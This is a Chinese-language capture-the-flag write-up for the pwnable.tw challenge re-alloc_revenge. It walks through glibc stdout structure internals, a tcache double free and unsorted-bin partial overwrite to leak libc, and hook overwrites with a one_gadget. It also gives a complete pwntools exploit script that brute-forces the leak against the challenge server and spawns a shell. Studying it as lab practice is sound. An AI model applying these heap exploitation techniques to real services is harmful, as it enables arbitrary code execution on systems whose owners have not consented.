和re-alloc一样，只不过开了PIE和RELRO，got表改不了了，要利用stdout结构体来leak libc，因为第一次做，而且过程稍微有些复杂，所以记录一下。

题目描述

pwnable.tw上的一道题，也就是在re-alloc上保护全开。

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

功能就不赘述了，因为binary和re-alloc一摸一样。

相关知识点

利用stdout结构体leak libc

当binary使用过puts函数时，会依照以下调用链调用到_IO_new_file_overflow:

1	_IO_puts --> _IO_sputn --> _IO_new_file_xsputn --> _IO_new_file_overflow

分析_IO_new_file_overflow源码：

int _IO_new_file_overflow (FILE *f, int ch)
{
    // 跳过这个if分支，需要设置"fp->_flags | _IO_NO_WRITES"
    if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
        f->_flags |= _IO_ERR_SEEN;
        __set_errno (EBADF);
        return EOF;
    }   
    // 跳过这个if分支，需要设置"fp->_flags | _IO_CURRENTLY_PUTTING"
    if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
        /* Allocate a buffer if needed. */
        if (f->_IO_write_base == NULL)
	    {
            _IO_doallocbuf (f);
            _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
        }
        
        if (__glibc_unlikely (_IO_in_backup (f)))
	    {
            size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
            _IO_free_backup_area (f);
            f->_IO_read_base -= MIN (nbackup, f->_IO_read_base - f->_IO_buf_base);
            f->_IO_read_ptr = f->_IO_read_base;
        }

        if (f->_IO_read_ptr == f->_IO_buf_end)
            f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
        f->_IO_write_ptr = f->_IO_read_ptr;
        f->_IO_write_base = f->_IO_write_ptr;
        f->_IO_write_end = f->_IO_buf_end;
        f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

        f->_flags |= _IO_CURRENTLY_PUTTING;
        if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
            f->_IO_write_end = f->_IO_write_ptr;
    }
    if (ch == EOF)
        // 需要调用的目标"_IO_do_write"，如果使得 _IO_write_base < _IO_write_ptr，且 _IO_write_base 处
        // 存在有价值的地址 （libc 地址）则可进行泄露
        // 在正常情况下，_IO_write_base == _IO_write_ptr 且位于 libc 中，所以可进行部分写(覆盖"_IO_write_base"低字节为"\x00")
        return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
    if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
        if (_IO_do_flush (f) == EOF)
            return EOF;
    *f->_IO_write_ptr++ = ch;
    if ((f->_flags & _IO_UNBUFFERED) || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
        if (_IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base) == EOF) 
            return EOF;
    return (unsigned char) ch;
}

在_IO_new_file_overflow中，我们要利用的就是其中的_IO_do_write。

在输出时，如果具有缓冲区，会输出_IO_write_base开始的缓冲区内容，直到_IO_write_ptr（也就是将_IO_write_base一直到_IO_write_ptr部分的值当做缓冲区，在无缓冲区时，两个指针指向同一位置，位于该结构体附近，也就是libc中），但是在setbuf后，理论上会不使用缓冲区。然而如果能够修改_IO_2_1_stdout_结构体的flags部分，使得其认为stdout具有缓冲区，再将_IO_write_base处的值进行partial overwrite，就可以泄露出libc地址了。

为了设置对应的flags的值，需要进一步分析_IO_do_write(其实就是_IO_new_do_write)：

int _IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
    return (to_do == 0 || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}

static size_t new_do_write (FILE *fp, const char *data, size_t to_do)
{
    size_t count;
    if (fp->_flags & _IO_IS_APPENDING)
        fp->_offset = _IO_pos_BAD;
    else if (fp->_IO_read_end != fp->_IO_write_base)
    {
        // "_IO_SYSSEEK"只是简单的调用lseek，但是我们不能完全控制"fp->_IO_write_base - fp->_IO_read_end"的值。
        // 如果"fp->_IO_read_end"的值设置为0，那么"_IO_SYSSEEK"的第二个参数值就会过大;
        // 如果设置"fp->_IO_write_base = fp->_IO_read_end"的话，那么在其它地方就会有问题，因为"fp->_IO_write_base"不能大于"fp->_IO_write_end"。
        // 所以这里要设置"fp->_flags | _IO_IS_APPENDING"，避免进入else if分支。
        off64_t new_pos = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
        if (new_pos == _IO_pos_BAD)
	        return 0;
        fp->_offset = new_pos;
    }
    // 需要的目标"_IO_SYSWRITE"
    count = _IO_SYSWRITE (fp, data, to_do);
    if (fp->_cur_column && count)
        fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
    _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
    fp->_IO_write_end = (fp->_mode <= 0 && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED)) ? fp->_IO_buf_base : fp->_IO_buf_end);
    return count;
}

综上可以得到，flags需要满足的条件为：

_flags = 0xfbad0000                 // Magic number
_flags & = ~_IO_NO_WRITES           // _flags = 0xfbad0000
_flags | = _IO_CURRENTLY_PUTTING    // _flags = 0xfbad0800
_flags | = _IO_IS_APPENDING         // _flags = 0xfbad1800

同时可以将_IO_read_ptr, _IO_read_end, _IO_read_base, _IO_write_base设置为：

_IO_read_ptr = 0;
_IO_read_end = 0;
_IO_read_base = 0;
_IO_write_base = 0x7fXXXXXXXX00;

然后就可以根据输出的数据leak出libc地址了。

利用思路

利用alloc功能在size=0时存在的uaf，以及realloc中当size < old_size而触发的free(remainder)操作，形成chunk overlap，然后覆盖chunk的size至足够放进unsorted bin中（这里因为要爆破而且连远程的延迟比较大，所以尽量小）。
为了保证能够顺利地将chunk放进unsorted bin中，需要绕过这里的检查，也就是需要先free掉足够大小的chunk，保证该需要放进unsorted bin的nextchunk的prev_inuse area为1。由于每次分配最大的size为0x78也就是chunk的size最大为0x80，这里要进行多次的alloc(0x68), realloc(0x78), free()操作（为了防止tcache中刚被free掉的chunk又被取出来）。直到nextchunk正好指向size为0x80的fastbin。
1
2
if (__glibc_unlikely (!prev_inuse(nextchunk)))
malloc_printerr ("double free or corruption (!prev)");

此外，由于后续的操作需要保持unsorted bin中和tcache bin中同时存在该伪造的unsorted bin，从而能从该tcache中分配到位于stdout结构体的内存，所以要在前面提到的free(remainder)形成的tcache bin初形成该chunk的double free，从而在分配该处的chunk时仍能将它保留在tcache中。

tcache bin  ==>  +--------+ <-- victim_chunk                     tcache bin ==> +--------+ <-- same victim_chunk
                 |        |                   after malloc                      |        |
                 +--------+<--+            ===================>                 +--------+
                 |fd |    |   |                                                 |        |
                 +--------+   |                                                 +--------+
                   |          |
                   +----------+

进一步地，由于alloc会对输入地字符串强制添加末尾\x00，从而会将上一步中提到的double free链（也就是该tache bin的fd）的低字节覆盖为\x00，这里需要将该chunk的地址保持为低字节是\x00，从而即使低字节被覆盖也不影响double free链，而做法就是在最开始得时候分配一定size的chunk并free到tcache中去（其实这里的chunk在最后的exploite也会用到，因为那时unsorted bin已经被破坏了，不能分配tcache或者fastbin中没有的chunk，否则会造成从unsorted bin中取而报错）。

在伪造好相应的chunk后，分配并释放到unsorted bin中，再用uaf进行partial overwrite unsorted bin->fd为stdout(bruteforce 4 bits)，然后再从相应tcache bin中取出该chunk，使得tcache bin指向stdout

tcache bin ==> +--------+ <--victim_chunk               |
               |        |                               |
               +--------+                               |
               |fd |    |                               |
               +--------+                               |
                 |                                      |
                 +----------> +--------+ <--stdout      |
                              |_flags  |                |
                              +--------+                |
                              |        |                |
                              +--------+                |   after malloc
 ------------------------------------------------------ +  =============> tcache bin ==> +--------+ <--stdout
unsorted bin ==> +--------+ <--same victim_chunk        |                                |_flags  |
                 |        |                             |                                +--------+
                 +--------+                             |                                |        |
                 |fd | bk |--------> main_arena         |                                +--------+        
                 +--------+                             |                         
                   |                                    |
                   +----------> +--------+ <--stdout    |
                                |_flags  |              |
                                +--------+              |
                                |        |              |
                                +--------+              |

这个时候只要分配stdout出的chunk就能修改相应的stdout结构体，达到输出数据从而leak libc的目的。
之后因为unsorted bin被破坏的缘故，并且仅能使用一个heap进行exploite（另一个heap不能被free，否则会报错）和只能通过bins中已有的chunk进行利用，分配到__realloc_hook处的chunk，将__realloc_hook改为malloc，再将__malloc_hook改为one_gadget（为了调整栈帧，使得[rsp + 0x70] == NULL。
触发realloc来getshell。

exp

# context.log_level = "debug"

def alloc(index, size, data):
    p.sendlineafter("Your choice: ", "1")
    p.sendlineafter("Index:", str(index))
    p.sendlineafter("Size:", str(size))
    p.sendafter("Data:", data)

def realloc(index, size, data):
    p.sendlineafter("Your choice: ", "2")
    p.sendlineafter("Index:", str(index))
    p.sendlineafter("Size:", str(size))
    if size != 0:
        p.sendafter("Data:", data)

def free(index):
    p.sendlineafter("Your choice: ", "3")
    p.sendlineafter("Index:", str(index))

offset = 0x1e7570
realloc_hook_offset = libc.symbols["__realloc_hook"]
malloc_offset = libc.symbols["malloc"]
one_gadget_offset = 0x106ef8

while True:
    try:
        # make the lowest byte of bins[1]'s address be \x00
        # also provide chunks for exploite since at the very end the unsorted bin is broken, we can only use the chunk in the tcache
        alloc(0, 0x28, "AAAA")
        free(0)
        alloc(0, 0x48, "AAAA")
        free(0)

        # three freed tcache bins size = [0x60, 0x40, 0x20]
        # bins[0] and bins[2] have the same address (both size area are 0x20)
        # bins[1] is right next to bins[0] and bins[2]
        alloc(0, 0x58, "AAAA")
        realloc(0, 0, "")
        realloc(0, 0x18, "BBBB")
        free(0)

        # make double free on bins[1]
        # thus we can use two same chunk on size 0x40 for the following exploit
        alloc(0, 0x38, "AAAA")
        realloc(0, 0, "")
        alloc(1, 0x38, "BBBB")
        free(0)
        realloc(1, 0x38, "B" * 0x10)
        free(1)

        # alloc space for unsorted bin
        # make fake unstored bin's next chunk point to exactly a valid chunk
        # free 10 chunks(actually only 9 can be seen in the bins while debugging, why?)
        for i in range(9):
            alloc(1, 0x68, "AAAA")
            realloc(1, 0x78, "AAAA")
            free(1)

        # alloc bins[0] to overwrite the size area of bins[1] into 0x441(8 * 0x80 + 0x40 + 0x1)
        # then alloc bins[1] and free it to unsorted bin
        alloc(0, 0x58, "D" * 0x18 + p64(0x441))
        free(0)
        alloc(1, 0x38, "DDDD")
        realloc(1, 0, "")

        # partially write the unsorted bin->fd into stdout(bruteforce 4 bits)
        # make the tcache bins whose size is 0x40 point to stdout
        realloc(1, 0x38, p16(0x5760))
        alloc(0, 0x38, "DDDD")

        # alloc the chunk at stdout
        # make _flags = 0x7fdf0ec12760 ... to invoke data print
        # _flags = MAGIC                    # 0xfbad0000 
        # _flags &= ~_IO_NO_WRITES          # _flags = 0xfbad0000 
        # _flags |= _IO_CURRENTLY_PUTTING   # _flags = 0xfbad0800
        # _flags |= _IO_IS_APPENDING        # _flags = 0xfbad1800
        # _IO_read_ptr = 0, 
        # _IO_read_end = 0, 
        # _IO_read_base = 0
        # _IO_write_base = 0x7ffff7dd0700
        # _IO_write_ptr = 0x7ffff7dd07e3
        # thus data between _IO_write_base and _IO_write_ptr will be print out
        realloc(0, 0x18, "AAAA")
        free(0)
        alloc(0, 0x38, p64(0xfbad1800) + p64(0) * 3)

        # leak libc
        string = p.recv(16)
        print(string)
        if string[0] == "$":
            p.close()
            if _pwn_remote == 0:
                p = process(argv=[_proc], env=_setup_env())
            else:
                p = remote('chall.pwnable.tw', 10310)
            if _debug != 0:
                gdb.attach(p)
            continue
        
        libc_addr = u64(string[8:])
        libc_base = libc_addr - offset
        realloc_hook = libc_base + realloc_hook_offset
        libc_malloc = libc_base + malloc_offset
        one_gadget = libc_base + one_gadget_offset

        break

    except:
        p.close()
        if _pwn_remote == 0:
            p = process(argv=[_proc], env=_setup_env())
        else:
            p = remote('chall.pwnable.tw', 10310)
        if _debug != 0:
            gdb.attach(p)
        

success("libc_base: " + hex(libc_base))
success("realloc_hook: " + hex(realloc_hook))
success("libc_malloc: " + hex(libc_malloc))
success("one_gadget: " + hex(one_gadget))

# make heap[1] == NULL (cannot use heap[0] any more)
realloc(1, 0x18, "A" * 0x10)
free(1)

# use the 0x80 tcache and prepared tcache
# create three tcache bins = [0x80, 0x50, 0x30], bins[0] and bins[2] are the same (0x30)
alloc(1, 0x78, "AAAA")
realloc(1, 0, "")
realloc(1, 0x28, "BBBB")
free(1)

# use bins[2] to overwrite the size area and fd of bins[1] to  0x51 and realloc_hook_addr
alloc(1, 0x78, "A" * 0x28 + p64(0x51) + p64(realloc_hook))
realloc(1, 0x18, "AAAA")
free(1)

# make tcache bins in size 0x50 point to realloc_hook
alloc(1, 0x48, "AAAA")
realloc(1, 0x18, "BBBB")
free(1)

# make realloc_hook = malloc, malloc_hook = one_gadget
# then the call will be realloc ==> realloc_hook(malloc) ==> malloc_hook(one_gadget)
# because three "push"'s in malloc will help to satisfy the one_gadget condition that [rsp + 0x70] == NULL 
alloc(1, 0x48, p64(libc_malloc) + p64(one_gadget))

# use realloc to trigger
realloc(1, 0, "")

# use vps to get flag
# p.sendline("cat /home/re-alloc_revenge/flag")
# print(p.recv())

p.interactive()

小结

新姿势，unsorted bin->fd的partial overwrite改成stdout，在没有show的情况下进行leak libc
只有两个heap外加只有realloc操作再加各种崩坏的unsorted bin和tcache double free check，以及需要bruteforce，调试+写exp的过程对我来说那叫一个…
貌似还有一种改tcache struct的做法，目前还没研究，以后有时间搞一下

参考资料

思路来源，但是貌似这个脚本有问题：http://www.ntype.club/re-alloc_revenge/
改tcache stuct的做法（还没学着调过）：https://sh1ner.github.io/2020/02/05/pwnable-tw-re-alloc-revenge/
利用stdout进行输出：https://github.com/ctf-wiki/ctf-wiki/blob/master/docs/pwn/linux/glibc-heap/tcache_attack-zh.md
同上：https://n0va-scy.github.io/2019/09/21/IO_FILE/
glibc2.29源码：https://elixir.bootlin.com/glibc/glibc-2.29/source